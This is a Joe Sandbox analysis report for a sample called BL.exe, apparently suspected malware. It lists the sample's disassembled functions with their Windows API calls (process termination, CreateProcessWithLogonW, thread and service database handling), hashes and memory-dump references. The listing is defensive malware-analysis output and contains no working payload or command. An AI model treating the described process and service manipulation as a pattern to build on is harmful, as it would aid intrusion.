                                                                                                                            • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                                                            • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                            • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                                                            Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 752480666-0
                                                                                                                            • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                            • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                            • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                            • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                            Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3275902921-0
                                                                                                                            • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                            • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                                            • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                            • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                                            Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                            • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1413079979-0
                                                                                                                            • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                            • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                                            • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                            • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                            Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                                            • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                                            • __getptd.LIBCMT ref: 004141A8
                                                                                                                            • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                                            • __dosmaperr.LIBCMT ref: 00414201
                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1803633139-0
                                                                                                                            • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                            • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                                            • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                            • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                                            Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3275902921-0
                                                                                                                            • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                            • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                            • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                            • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                                            Function 004554C0 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32 ref: 004554DF
                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3691411573-0
                                                                                                                            • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                                                            • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                                                                            • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                                                            • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                                                                            Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1814673581-0
                                                                                                                            • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                            • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                                            • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                            • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                                            Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2833360925-0
                                                                                                                            • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                            • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                            • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                            • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                            Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                            • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                            • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                            • EndPath.GDI32(?), ref: 0044724E
                                                                                                                            • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 372113273-0
                                                                                                                            • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                            • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                            • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                            • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                            Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4278518827-0
                                                                                                                            • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                            • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                                            • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                            • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                                            Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1035833867-0
                                                                                                                            • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                            • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                                            • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                            • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                                                            Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                            • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                              • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                            • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                            • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3495660284-0
                                                                                                                            • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                            • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                            • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                            • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                            Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 839392675-0
                                                                                                                            • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                            • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                            • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                            • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                            Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\BL.exe,00000004), ref: 00436055
                                                                                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                            • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
